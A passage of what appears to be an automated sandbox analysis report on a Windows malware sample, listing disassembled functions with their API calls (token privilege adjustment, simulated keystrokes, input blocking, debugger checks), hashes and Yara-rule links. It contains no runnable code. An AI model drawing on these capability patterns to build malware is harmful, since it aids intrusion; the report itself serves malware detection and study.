                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
                                                                      • Instruction ID: 860fe1091a5170ceca49bf5c4ddaa63c5cd0b47585db6e2913d739b6ca33a9a9
                                                                      • Opcode Fuzzy Hash: 88eb1f8115306b7efdbc0460ea14270001452fd54937ba1d73828eaddfdd1f70
                                                                      • Instruction Fuzzy Hash: AE31C375911218ABCB21DF64D888B9DBBF8AF18310F5041EAE81CA6260E7349F818F44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C151DA
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C15238
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00C152A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
                                                                      • Instruction ID: ecea70beacaaa79f7df76143a708c9f9be3731f2a383d412937c24a950147f80
                                                                      • Opcode Fuzzy Hash: bc35fd018812ab02f58b09bd5c15232dc8ad12ca0f12d26b566bdd0542a47ad9
                                                                      • Instruction Fuzzy Hash: B8310975A10518DFDB00DF54D884BADBBB4FF49314F048099E805AB2A2DB32E956DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
                                                                        • Part of subcall function 00BBFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                                      • GetLastError.KERNEL32 ref: 00C0174A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 577356006-0
                                                                      • Opcode ID: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
                                                                      • Instruction ID: 55c46544654ab315dcf84bd73a3fbce8df2d2fbc46b906f222ddf6ba6cd26f5a
                                                                      • Opcode Fuzzy Hash: 44aa795e7d4851a093d4b76381b665073208e49fcea0093dd7071736244021d8
                                                                      • Instruction Fuzzy Hash: 1611BCB2414205AFD718AF54DCC6EBEB7F9EB04714B24852EE46652281EBB0BC41CB20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C0D608
                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C0D645
                                                                      • CloseHandle.KERNEL32(?), ref: 00C0D650
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                      • String ID:
                                                                      • API String ID: 33631002-0
                                                                      • Opcode ID: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
                                                                      • Instruction ID: b0b3befe03c5f93058165c503aa83b9ab5f4b1bbce6d1eb59b29548eb503dee6
                                                                      • Opcode Fuzzy Hash: 150d29fcee0224a9030ad4fa32ca7ee93fc34c3fdac2695aec24fba3db9b25a7
                                                                      • Instruction Fuzzy Hash: B7118E71E01228BFDB108F95DC84FAFBBBCEB45B60F108111F914F7290C2704A018BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C0168C
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C016A1
                                                                      • FreeSid.ADVAPI32(?), ref: 00C016B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
                                                                      • Instruction ID: 79c4aea2ca6bae88156152c71e2be5ab9ab550ee019f5d7d1467c955376ad831
                                                                      • Opcode Fuzzy Hash: 7619bd968ccefae144ff6a5a084b0c2576cbb882c0fa5802a98d86747e89ab96
                                                                      • Instruction Fuzzy Hash: 03F0F47195030DFBDB00DFE4DD89AAEBBBCEB08704F504565E901E2181E774AA448B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /
                                                                      • API String ID: 0-2043925204
                                                                      • Opcode ID: 69f8fbf7ef2df067a9bd98f25050e52c8e3c7fa2489712fa182f51e7ab8126cb
                                                                      • Instruction ID: 8d783af19e5fa6bbb9700a5a6c9e58725aa77ed95a588a0135b61d8dd0d34d85
                                                                      • Opcode Fuzzy Hash: 69f8fbf7ef2df067a9bd98f25050e52c8e3c7fa2489712fa182f51e7ab8126cb
                                                                      • Instruction Fuzzy Hash: 8041287650021A6FCB249FB9CC89EBBBBF8EB84314F1042AAF905D7280F6709D41CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BFD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00BFD28C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID: X64
                                                                      • API String ID: 2645101109-893830106
                                                                      • Opcode ID: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                                      • Instruction ID: 92bfef09a426d9a78583d7640dead04c39f90e8eb9bee6094f53b2254deefecb
                                                                      • Opcode Fuzzy Hash: 2e3fbde773c5e97a32f94a0b61788dcaf3c8cd970739fd9dd6c995ec135414bd
                                                                      • Instruction Fuzzy Hash: F5D0C9B481111DEBCB94DB90DCC8EEDB7BCBB04305F100191F106A2000D77495488F10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BCCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction ID: 28fd9abe0a919ddc4f8c218714fc4689e0a8bd6f737a7ffd3d81ef58f0a28711
                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction Fuzzy Hash: 16021C71E002199BDF14CFA9C880BAEBBF1EF58314F2581ADD819E7384D731AE458B94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C16918
                                                                      • FindClose.KERNEL32(00000000), ref: 00C16961
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                                      • Instruction ID: 15d95bcd99a590975185353f0d4f88ddd60639b916c9ff7e11de74a72ddaebab
                                                                      • Opcode Fuzzy Hash: 6a09158affe7b5c88b531b5060860b91d8bffba1f62e5765764420a2fb296663
                                                                      • Instruction Fuzzy Hash: 811193316142109FC710DF29D484A5ABBE5FF85328F14C699E4698F3A2C731EC45CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137E4
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C24891,?,?,00000035,?), ref: 00C137F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                                      • Instruction ID: 762ffaaf9163f1779aaff96240948d3e5bb0d377f0e395aff6cf49adb1871a38
                                                                      • Opcode Fuzzy Hash: d585da721279ba12508e538fcbc0d0adfc0db0faf1efc3ffae3d6a346fc56def
                                                                      • Instruction Fuzzy Hash: 11F0E5B16043286AE720176A8C8DFEF3AAEEFC5765F000175F509E22D1DA609D44C7F0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00C0B25D
                                                                      • keybd_event.USER32 ref: 00C0B270
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: InputSendkeybd_event
                                                                      • String ID:
                                                                      • API String ID: 3536248340-0
                                                                      • Opcode ID: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                                      • Instruction ID: a6d2353ff202d016ed39fb72d6e44f9dd1fdde587f1cf563bd503d639aa6cb50
                                                                      • Opcode Fuzzy Hash: cb36356681be86a67f36abcfd8d3976367fed667c19a9ec1d6a3d7f6581646e2
                                                                      • Instruction Fuzzy Hash: B5F0177181428EABDB05DFA1C806BAE7BB4FF08309F00800AF965A61A2C3798611DF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                                      • CloseHandle.KERNEL32(?), ref: 00C010E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                                      • Instruction ID: 6ded50b1da2994825cf9fa37c1cd15e144fde1ffb9dbf13330cd15b5a9227d64
                                                                      • Opcode Fuzzy Hash: c2353009076010f354130cc7363752c87e8d3cd82c5935bd90cb7c24a07a008e
                                                                      • Instruction Fuzzy Hash: CEE0BF72014611AFE7252B51FC45FBB77E9EB04320B14886DF5A5904B1DBA2ACA0DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BACAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Variable is not of type 'Object'., xrefs: 00BF0C40
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable is not of type 'Object'.
                                                                      • API String ID: 0-1840281001
                                                                      • Opcode ID: 774871be14f6d7bdf54b91a05e1ca271a285fea1a229e5d1f118c11a74e461f4
                                                                      • Instruction ID: 1563426346c9d7938c9b85ca076f03f62d88bdf226c105a1401eb40f85b63c03
                                                                      • Opcode Fuzzy Hash: 774871be14f6d7bdf54b91a05e1ca271a285fea1a229e5d1f118c11a74e461f4
                                                                      • Instruction Fuzzy Hash: CC3259749182189FCF14EF94C981AFDBBF5FF06304F1440A9E906AB292DB75AD49CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD6766,?,?,00000008,?,?,00BDFEFE,00000000), ref: 00BD6998
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                                      • Instruction ID: e9b5acdc3b6853882e5f07dd56f154b7846074604275e1f5e335af621087ae34
                                                                      • Opcode Fuzzy Hash: 944870938bd24d35eca142689e128dcebe3c8a702b520325399446ff924ffef7
                                                                      • Instruction Fuzzy Hash: A4B14C316106099FD719CF28C486B65BBE0FF45364F25869AE8D9CF3A2D336E981CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                                      • Instruction ID: 4a9c044e6eef2c703a70df0bf3c0440b3cdd1067a22336fdf59d58923134fe82
                                                                      • Opcode Fuzzy Hash: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                                      • Instruction Fuzzy Hash: 1A126E759002299BCB24CF58C881BFEB7F5FF48710F14819AE949EB251DBB09A85CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
